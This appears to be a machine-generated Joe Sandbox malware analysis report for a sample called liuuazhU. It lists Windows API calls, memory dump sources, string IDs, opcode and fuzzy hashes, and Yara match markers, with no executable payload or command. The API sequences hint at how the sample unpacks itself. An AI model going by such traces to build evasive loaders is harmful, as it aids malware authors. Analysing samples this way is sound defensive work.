                                                                                        • Snapshot File: hcaresult_11_2_2e4c0000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 10f853b27bb31684e47301dfa28ab4b0bad1b90c360f5b7766970720c7b063d7
                                                                                        • Instruction ID: ff208400831998d962137456825b4e44671ce29be823872b4334a056e8807e83
                                                                                        • Opcode Fuzzy Hash: 10f853b27bb31684e47301dfa28ab4b0bad1b90c360f5b7766970720c7b063d7
                                                                                        • Instruction Fuzzy Hash: 2282CE74E052298FDB64DF69C894BEDBBB2AB59300F1091EAD50CA7351EB349E81CF50
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.3120056947.000000002E4C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2E4C0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_2e4c0000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 3881b3c2cedc86361593a1ecc808b658c2905305b913b416fe01f637d8085194
                                                                                        • Instruction ID: 2fa8641254d724fdaf835f330c75b1cbb6b7ec4355f21e89e65e736152ac8aec
                                                                                        • Opcode Fuzzy Hash: 3881b3c2cedc86361593a1ecc808b658c2905305b913b416fe01f637d8085194
                                                                                        • Instruction Fuzzy Hash: 90F18A74E002288FDB64DFA5C990BEDBBB2AB98300F2085AAD50DA7355DB355E85CF50
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.3120056947.000000002E4C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2E4C0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_2e4c0000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: a45afbb3e25a85a9fa09c92553a7d34dd290f457f7ea5d7eb47050ee3c68ac6d
                                                                                        • Instruction ID: 65f1f71988240ae90273e32102af1bd4f4e2d09f696135d4ca6dbfd99f75d390
                                                                                        • Opcode Fuzzy Hash: a45afbb3e25a85a9fa09c92553a7d34dd290f457f7ea5d7eb47050ee3c68ac6d
                                                                                        • Instruction Fuzzy Hash: DD819074E052288FDB64DF66C9507EDBBF2AF89300F1091AAD50DA7251DB359E82CF50
                                                                                        APIs
                                                                                        • OleInitialize.OLE32(00000000), ref: 004019FD
                                                                                        • _getenv.LIBCMT ref: 00401ABA
                                                                                        • GetCurrentProcessId.KERNEL32 ref: 00401ACD
                                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401AD6
                                                                                        • Module32First.KERNEL32 ref: 00401C48
                                                                                        • CloseHandle.KERNEL32(00000000,?,?,00000008,00000000), ref: 00401C9D
                                                                                        • Module32Next.KERNEL32(00000000,?), ref: 00401D02
                                                                                        • Module32Next.KERNEL32(00000000,?), ref: 00401DB6
                                                                                        • CloseHandle.KERNELBASE(00000000), ref: 00401DC4
                                                                                        • GetModuleHandleA.KERNEL32(00000000), ref: 00401DCB
                                                                                        • FindResourceA.KERNEL32(00000000,00000000,00000008), ref: 00401E90
                                                                                        • LoadResource.KERNEL32(00000000,00000000), ref: 00401E9E
                                                                                        • LockResource.KERNEL32(00000000), ref: 00401EA7
                                                                                        • SizeofResource.KERNEL32(00000000,00000000), ref: 00401EB3
                                                                                        • _malloc.LIBCMT ref: 00401EBA
                                                                                        • _memset.LIBCMT ref: 00401EDD
                                                                                        • SizeofResource.KERNEL32(00000000,?), ref: 00401F02
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000001.1965196360.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 0000000B.00000001.1965196360.0000000000426000.00000040.00000001.00020000.00000000.sdmp
                                                                                        • Associated: 0000000B.00000001.1965196360.000000000043C000.00000040.00000001.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_1_400000_liuuazhU.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Resource$HandleModule32$CloseNextSizeof$CreateCurrentFindFirstInitializeLoadLockModuleProcessSnapshotToolhelp32_getenv_malloc_memset
                                                                                        • String ID: !$!$!$"$%$'$'$)$*$*$.$.$0$4$4$4$5$6$8$:$D$E$U$V$V$W$W$W$W$[$[$_._$___$h$o$o$o$v$v$v$v$x$x$x$x${${${${
                                                                                        • API String ID: 1430744539-2962942730
                                                                                        • Opcode ID: d0a656ef22f929bc6f1ae9c8f6a3c9921df1d352ff09963eac3f83f05ace134f
                                                                                        • Instruction ID: 7b7814addfdf4b3cbdaef5ede101091f5fb3e94df766619d88950efa0d528cfd
                                                                                        • Opcode Fuzzy Hash: d0a656ef22f929bc6f1ae9c8f6a3c9921df1d352ff09963eac3f83f05ace134f
                                                                                        • Instruction Fuzzy Hash: B3628C2100C7C19EC321DB388888A5FBFE55FA6328F484A5DF1E55B2E2C7799509C76B

                                                                                        Control-flow Graph
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.3120056947.000000002E4C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2E4C0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_2e4c0000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: $C.$(%C.$(o^q$,$C.$4%C.$8$C.$@%C.$D$C.$L%C.$P$C.$X%C.$\$C.$d%C.$h$C.$p%C.$$C.$$C.$$^q$$^q
                                                                                        • API String ID: 0-2478616931
                                                                                        • Opcode ID: e01baf92386f6882779007963e2f00d3ad6006c4fff224c3b122fd81a8e43af4
                                                                                        • Instruction ID: d1d154a7095021c0efc97555545ca9975fc0e5adb5d565c5bb0dc667621a1a89
                                                                                        • Opcode Fuzzy Hash: e01baf92386f6882779007963e2f00d3ad6006c4fff224c3b122fd81a8e43af4
                                                                                        • Instruction Fuzzy Hash: 58723674A00218CFDB14DFA4C8A0B9EBB76EF98300F2481AAD41AAB395DF359D45DF51
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000001.1965196360.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 0000000B.00000001.1965196360.0000000000426000.00000040.00000001.00020000.00000000.sdmp
                                                                                        • Associated: 0000000B.00000001.1965196360.000000000043C000.00000040.00000001.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_1_400000_liuuazhU.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: __amsg_exit$_fast_error_exit$CommandEnvironmentInitializeLineStrings___crt__cinit__ioinit__mtinit__setargv__setenvp
                                                                                        • String ID:
                                                                                        • API String ID: 2598563909-0
                                                                                        • Opcode ID: 2d668fad8e0b173589b4563f5a4f7b2cb6976b6486fb72b9956ee4840b6c9fb0
                                                                                        • Instruction ID: 67c2b95978a5c3de314e94e7eee78366e8702871eb07600154e5c77a41a3d030
                                                                                        • Opcode Fuzzy Hash: 2d668fad8e0b173589b4563f5a4f7b2cb6976b6486fb72b9956ee4840b6c9fb0
                                                                                        • Instruction Fuzzy Hash: 5321E770A05304DAFB207BB3E98676932B46F00309F00453FE508B62D2EB7C89918A5C
                                                                                        APIs
                                                                                        • lstrlenA.KERNEL32(?), ref: 00401906
                                                                                        • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000001), ref: 0040192F
                                                                                        • GetLastError.KERNEL32 ref: 00401940
                                                                                        • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401958
                                                                                        • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401980
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000001.1965196360.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 0000000B.00000001.1965196360.0000000000426000.00000040.00000001.00020000.00000000.sdmp
                                                                                        • Associated: 0000000B.00000001.1965196360.000000000043C000.00000040.00000001.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_1_400000_liuuazhU.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ByteCharMultiWide$ErrorLastlstrlen
                                                                                        • String ID:
                                                                                        • API String ID: 3322701435-0
                                                                                        • Opcode ID: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
                                                                                        • Instruction ID: 001f8acd6346668203df0e37acbb0982e2c141f20d3592a2a78c171e7710dcce
                                                                                        • Opcode Fuzzy Hash: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
                                                                                        • Instruction Fuzzy Hash: 4011C4756003247BD3309B15CC88F677F6CEB86BA9F008169FD85AB291C635AC04C6F8

                                                                                        Control-flow Graph
                                                                                        APIs
                                                                                        • GetCurrentProcess.KERNEL32 ref: 2E7C4A5E
                                                                                        • GetCurrentThread.KERNEL32 ref: 2E7C4A9B
                                                                                        • GetCurrentProcess.KERNEL32 ref: 2E7C4AD8
                                                                                        • GetCurrentThreadId.KERNEL32 ref: 2E7C4B31
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.3120196643.000000002E7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2E7C0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_2e7c0000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID: Current$ProcessThread
                                                                                        • String ID:
                                                                                        • API String ID: 2063062207-0
                                                                                        • Opcode ID: 9fa1fc5be6c3f23d474634e39080f65f630017d5457f6299840970126de0546c
                                                                                        • Instruction ID: a41f48d340a881e60f9f63e9673cb5d02ba5a343b088aedc3e37b2a4867f9813
                                                                                        • Opcode Fuzzy Hash: 9fa1fc5be6c3f23d474634e39080f65f630017d5457f6299840970126de0546c
                                                                                        • Instruction Fuzzy Hash: 6B516AB09007098FDB04DFA9D588BDEBBF5EF88314F20C12AD518A7260DB349984CF65

                                                                                        Control-flow Graph
                                                                                        APIs
                                                                                        • GetCurrentProcess.KERNEL32 ref: 2E7C4A5E
                                                                                        • GetCurrentThread.KERNEL32 ref: 2E7C4A9B
                                                                                        • GetCurrentProcess.KERNEL32 ref: 2E7C4AD8
                                                                                        • GetCurrentThreadId.KERNEL32 ref: 2E7C4B31
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.3120196643.000000002E7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2E7C0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_2e7c0000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID: Current$ProcessThread
                                                                                        • String ID:
                                                                                        • API String ID: 2063062207-0
                                                                                        • Opcode ID: f20fda1b29fa90adfd1801b26ed3a5f5ba83276c60a302f8ce9260816d71b93d
                                                                                        • Instruction ID: 65967268f1f659eeacc7cdf8bfed029587620e892ec6b63990b65e93f778ee7d
                                                                                        • Opcode Fuzzy Hash: f20fda1b29fa90adfd1801b26ed3a5f5ba83276c60a302f8ce9260816d71b93d
                                                                                        • Instruction Fuzzy Hash: 5F5158B09007098FDB04DFA9D588BDEFBF5AB88314F20C12AE519A7360DB349984CF65
                                                                                        APIs
                                                                                        • _malloc.LIBCMT ref: 0040AF80
                                                                                          • Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
                                                                                          • Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
                                                                                          • Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4
                                                                                        • std::bad_alloc::bad_alloc.LIBCMT ref: 0040AFA3
                                                                                          • Part of subcall function 0040AEFC: std::exception::exception.LIBCMT ref: 0040AF08
                                                                                        • std::bad_exception::bad_exception.LIBCMT ref: 0040AFB7
                                                                                        • __CxxThrowException@8.LIBCMT ref: 0040AFC5
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000001.1965196360.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 0000000B.00000001.1965196360.0000000000426000.00000040.00000001.00020000.00000000.sdmp
                                                                                        • Associated: 0000000B.00000001.1965196360.000000000043C000.00000040.00000001.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_1_400000_liuuazhU.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AllocateException@8HeapThrow_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exceptionstd::exception::exception
                                                                                        • String ID:
                                                                                        • API String ID: 1411284514-0
                                                                                        • Opcode ID: 248d97f5b0d58b32bb2c6dfd0cee56c1e8c558e55d5e2921fa5105a46d33be9f
                                                                                        • Instruction ID: 8b9ae61c6da4be1dff3a05d3864a1109474d1d20ea1a05e38be312cad591667e
                                                                                        • Opcode Fuzzy Hash: 248d97f5b0d58b32bb2c6dfd0cee56c1e8c558e55d5e2921fa5105a46d33be9f
                                                                                        • Instruction Fuzzy Hash: 67F0BE21A0030662CA15BB61EC06D8E3B688F4031CB6000BFE811761D2CFBCEA55859E

                                                                                        Control-flow Graph
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.3120056947.000000002E4C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2E4C0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_2e4c0000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: D)C.$D)C.$D)C.
                                                                                        • API String ID: 0-1439639639
                                                                                        • Opcode ID: 6028694659aca3ce73f7f7a715757be4620504e666ede871926a07b86ac7a09d
                                                                                        • Instruction ID: 043150d8284f5a44c0d0ace4322efaf1d2f361fa69c9796a4eec28e82bbe3ee3
                                                                                        • Opcode Fuzzy Hash: 6028694659aca3ce73f7f7a715757be4620504e666ede871926a07b86ac7a09d
                                                                                        • Instruction Fuzzy Hash: 6171F274E00218CFDB24DFA5C994BADBBB2BF88304F2084A9D909AB355DB355A85CF41
                                                                                        APIs
                                                                                        • GetModuleHandleW.KERNELBASE(?), ref: 2E7CD812
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.3120196643.000000002E7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2E7C0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_2e7c0000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID: HandleModule
                                                                                        • String ID: 86}.
                                                                                        • API String ID: 4139908857-1920637956
                                                                                        • Opcode ID: 9852ef7a6ac0b6b9f5c7bfca02059ee66864acb798b2468a94426acdcf836fbd
                                                                                        • Instruction ID: 58e354b35297e2d5176880425a89233d3f2384d8e068eb78e0b60a813cebdb16
                                                                                        • Opcode Fuzzy Hash: 9852ef7a6ac0b6b9f5c7bfca02059ee66864acb798b2468a94426acdcf836fbd
                                                                                        • Instruction Fuzzy Hash: CEA16770A007488FCB20CF69D080B9ABBF5BF99350F00992AD58AEB761D734E945CF91
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.3120056947.000000002E4C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2E4C0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_2e4c0000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: ,bq$,bq
                                                                                        • API String ID: 0-2699258169
                                                                                        • Opcode ID: 087a8a57baf1c9c167615e360f4a02d8dadc8904a45f65e0f11f62b809611a46
                                                                                        • Instruction ID: a545b43e3903fbec938d8ac3aad52074a30807a922cb2502ec46826a907867e9
                                                                                        • Opcode Fuzzy Hash: 087a8a57baf1c9c167615e360f4a02d8dadc8904a45f65e0f11f62b809611a46
                                                                                        • Instruction Fuzzy Hash: CB81923CA006058FCB04CFA9C884959B7F1FFAA214B15926BD51AE7365DB35EC41CBA1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.3120056947.000000002E4C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2E4C0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_2e4c0000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: Hbq$Hbq
                                                                                        • API String ID: 0-4258043069
                                                                                        • Opcode ID: 7f5a290a0038e8b285ea83e7a545aa57df3f8b0df3c6eb5cefdce9c11d273742
                                                                                        • Instruction ID: 985d6a08e34d3a695ae1a7b1cefd0c73820887b7ea3ff5126e15cf301d6fefa8
                                                                                        • Opcode Fuzzy Hash: 7f5a290a0038e8b285ea83e7a545aa57df3f8b0df3c6eb5cefdce9c11d273742
                                                                                        • Instruction Fuzzy Hash: 5C51D3383042548FDB058F25C894BAE7BE6FF99304F14846AE945CB396DB78E841CB91
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.3120056947.000000002E4C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2E4C0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_2e4c0000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: D)C.$D)C.
                                                                                        • API String ID: 0-3676446386
                                                                                        • Opcode ID: 0542ee53ba6716760eeceb143dae52022227be357ae24fd8218cd9656f867ffa
                                                                                        • Instruction ID: 1f78c2b08630b9108b14f97d50c02d36ec88e88caf634238b9fe481ddb073b96
                                                                                        • Opcode Fuzzy Hash: 0542ee53ba6716760eeceb143dae52022227be357ae24fd8218cd9656f867ffa
                                                                                        • Instruction Fuzzy Hash: FF314574D01218DFDB14CFB6D8947DEBBB2AF89304F20942AD819BB241DB78554ACF52
                                                                                        APIs
                                                                                        • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 2E7CFAB1
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.3120196643.000000002E7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2E7C0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_2e7c0000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateWindow
                                                                                        • String ID:
                                                                                        • API String ID: 716092398-0
                                                                                        • Opcode ID: 55235653586a4af0fee100f324aae784e921d6bdc5283a722b1ee50469f99606
                                                                                        • Instruction ID: 67f985c96c49c4aaefaa80ad0f76645111c4b4685267fe20d661d4c8ae562b0b
                                                                                        • Opcode Fuzzy Hash: 55235653586a4af0fee100f324aae784e921d6bdc5283a722b1ee50469f99606
                                                                                        • Instruction Fuzzy Hash: A3716AB4D00218DFDF20CFA9D980ADDBBF5BB19304F10A1AAE958A7225D7319A85CF45
                                                                                        APIs
                                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 2E7C4CF3
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.3120196643.000000002E7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2E7C0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_2e7c0000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID: DuplicateHandle
                                                                                        • String ID:
                                                                                        • API String ID: 3793708945-0
                                                                                        • Opcode ID: b8069bc150f01254c14aeda934b0cc96155111125845b5b873cab0bd353eec64
                                                                                        • Instruction ID: 37668fd89547cbe4d969ef27ad0e32fd23d823ff43d0493a616c5694e0affc61
                                                                                        • Opcode Fuzzy Hash: b8069bc150f01254c14aeda934b0cc96155111125845b5b873cab0bd353eec64
                                                                                        • Instruction Fuzzy Hash: AF4166B9D002589FCB10CFA9D984ADEBBF5BB19310F14906AE918BB320D335A945CF54
                                                                                        APIs
                                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 2E7C4CF3
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.3120196643.000000002E7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2E7C0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_2e7c0000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID: DuplicateHandle
                                                                                        • String ID:
                                                                                        • API String ID: 3793708945-0
                                                                                        • Opcode ID: 69ad52d21ae060b24ca48d064aca7efec512cd49ff33c6235aee730cebd28437
                                                                                        • Instruction ID: eff2b46697dc3bd969df0c7b2694d452141b5ca3c1d943402386b0233199a139
                                                                                        • Opcode Fuzzy Hash: 69ad52d21ae060b24ca48d064aca7efec512cd49ff33c6235aee730cebd28437
                                                                                        • Instruction Fuzzy Hash: CE4156B9D002589FCB10CFAAD984ADEBBF5BB19310F14906AE918BB320D335A945CF54
                                                                                        APIs
                                                                                        • VirtualProtect.KERNELBASE(?,?,?,?), ref: 2A6BF01C
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.3115757303.000000002A6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2A6B0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_2a6b0000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID: ProtectVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 544645111-0
                                                                                        • Opcode ID: 606d3310017048eb188e45728b19cee7eb5e8e2a22cb490c17ff6ce29bd389ee
                                                                                        • Instruction ID: cade892478e9187cbdad163e0b113bf48cd702ce74ba43a0e831d2d67df52379
                                                                                        • Opcode Fuzzy Hash: 606d3310017048eb188e45728b19cee7eb5e8e2a22cb490c17ff6ce29bd389ee
                                                                                        • Instruction Fuzzy Hash: 253197B5D012589FCF14DFA9D980ADEFBF0BB49310F20942AE814B7224D735A945CF58
                                                                                        APIs
                                                                                        • CallWindowProcW.USER32(?,?,?,?,?), ref: 2E821E81
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.3120296894.000000002E820000.00000040.00000800.00020000.00000000.sdmp, Offset: 2E820000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_2e820000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID: CallProcWindow
                                                                                        • String ID:
                                                                                        • API String ID: 2714655100-0
                                                                                        • Opcode ID: e01f55bd4073f38475a1dce30e8f99602b91d0b238930aa9f2186df5e77cf6f7
                                                                                        • Instruction ID: a242aa82880e958824e5cef81f41d4144c4f2fb35b2cd7c6d3c129ffc35461f5
                                                                                        • Opcode Fuzzy Hash: e01f55bd4073f38475a1dce30e8f99602b91d0b238930aa9f2186df5e77cf6f7
                                                                                        • Instruction Fuzzy Hash: 61412CB8900745CFCB14CF99C888AAABBF5FF98314F24C459D558A7321D734A881CFA0
                                                                                        APIs
                                                                                        • GetModuleHandleW.KERNELBASE(?), ref: 2E7CD812
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.3120196643.000000002E7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2E7C0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_2e7c0000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID: HandleModule
                                                                                        • String ID:
                                                                                        • API String ID: 4139908857-0
                                                                                        • Opcode ID: 1b3130cfa9a615febd40d09ed621f2ab111d39c23ce4c505279e349e0ac82208
                                                                                        • Instruction ID: 44accd5a35a53e066d96d88e3a6f9ead9184c10f17d31212513a11fde0fc0388
                                                                                        • Opcode Fuzzy Hash: 1b3130cfa9a615febd40d09ed621f2ab111d39c23ce4c505279e349e0ac82208
                                                                                        • Instruction Fuzzy Hash: 5D3199B4D00259DFCB14CFAAD584ADEFBF5AB49310F14906AE918B7320D334A945CFA4
                                                                                        APIs
                                                                                          • Part of subcall function 0040AF66: _malloc.LIBCMT ref: 0040AF80
                                                                                        • SysAllocString.OLEAUT32 ref: 00401898
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000001.1965196360.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 0000000B.00000001.1965196360.0000000000426000.00000040.00000001.00020000.00000000.sdmp
                                                                                        • Associated: 0000000B.00000001.1965196360.000000000043C000.00000040.00000001.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_1_400000_liuuazhU.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AllocString_malloc
                                                                                        • String ID:
                                                                                        • API String ID: 959018026-0
                                                                                        • Opcode ID: 2b2277ba2f7599175ad158743716730806d9da3e8ba5769d67c84622d6ab0768
                                                                                        • Instruction ID: c2922591c351a4c461934d9b8210169c8be4224f150a02a6988c85a72df9e820
                                                                                        • Opcode Fuzzy Hash: 2b2277ba2f7599175ad158743716730806d9da3e8ba5769d67c84622d6ab0768
                                                                                        • Instruction Fuzzy Hash: BEF02073501322A7E3316B658841B47B6E8DF80B28F00823FFD44BB391D3B9C85082EA
                                                                                        APIs
                                                                                        • HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 0040D549
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000001.1965196360.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 0000000B.00000001.1965196360.0000000000426000.00000040.00000001.00020000.00000000.sdmp
                                                                                        • Associated: 0000000B.00000001.1965196360.000000000043C000.00000040.00000001.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_1_400000_liuuazhU.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CreateHeap
                                                                                        • String ID:
                                                                                        • API String ID: 10892065-0
                                                                                        • Opcode ID: b92e553731a4154449cde6b8e59536b0b0aa674871376bfeaf174e1f515a675d
                                                                                        • Instruction ID: a29dbb507fbbbc11cf477c5ad410ace9233c9b691e3651c0b65acef059567112
                                                                                        • Opcode Fuzzy Hash: b92e553731a4154449cde6b8e59536b0b0aa674871376bfeaf174e1f515a675d
                                                                                        • Instruction Fuzzy Hash: E8D05E36A54348AADB11AFB47C08B623BDCE388396F404576F80DC6290F678D641C548
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.3120056947.000000002E4C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2E4C0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_2e4c0000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 4'^q
                                                                                        • API String ID: 0-1614139903
                                                                                        • Opcode ID: 91490576682c8cfad66ae34613d9d9b092c055896ddf89ad7af1839b29876c74
                                                                                        • Instruction ID: 6e0aa51696075495fc7651b0052a35717e60087df72bfc8ed678d0697b3e7fa3
                                                                                        • Opcode Fuzzy Hash: 91490576682c8cfad66ae34613d9d9b092c055896ddf89ad7af1839b29876c74
                                                                                        • Instruction Fuzzy Hash: 4B417C386006059FCB05DF69C894AAA7BF5FF58B00F11406AE909DB3A2CBB4DD41CBA5
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.3120056947.000000002E4C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2E4C0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_2e4c0000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 4'^q
                                                                                        • API String ID: 0-1614139903
                                                                                        • Opcode ID: bdc1de7a7c01d8d01e8362fc1da331a3b22e277500c7f76497327fdc940d6adc
                                                                                        • Instruction ID: 48bb3fef3c5fb141a5823edaa6670b29adcb8bfc5efdd2642bea3557260ba8b6
                                                                                        • Opcode Fuzzy Hash: bdc1de7a7c01d8d01e8362fc1da331a3b22e277500c7f76497327fdc940d6adc
                                                                                        • Instruction Fuzzy Hash: 9821F739704196DFD704CF668C90AABBBE9ABA5218F0090ABE949C7341DF75E841CB74
                                                                                        APIs
                                                                                        • CloseHandle.KERNELBASE(?), ref: 2A6BF2C6
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.3115757303.000000002A6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2A6B0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_2a6b0000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseHandle
                                                                                        • String ID:
                                                                                        • API String ID: 2962429428-0
